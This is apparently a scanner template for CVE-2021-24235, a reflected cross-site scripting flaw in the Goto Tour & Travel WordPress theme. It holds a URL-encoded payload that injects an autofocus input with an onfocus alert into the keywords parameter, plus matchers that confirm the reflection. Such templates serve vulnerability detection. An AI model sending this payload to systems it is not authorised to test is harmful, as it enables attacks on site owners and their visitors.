id: CVE-2021-24235 info: name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235 tags: cve,cve2021,wordpress,xss,wp-theme requests: - method: GET path: - '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13' matchers-condition: and matchers: - type: word words: - "input/Autofocus/%0D*/Onfocus=alert(123);" - "goto-tour-list-js-extra" part: body condition: and - type: word part: header words: - text/html - type: status status: - 200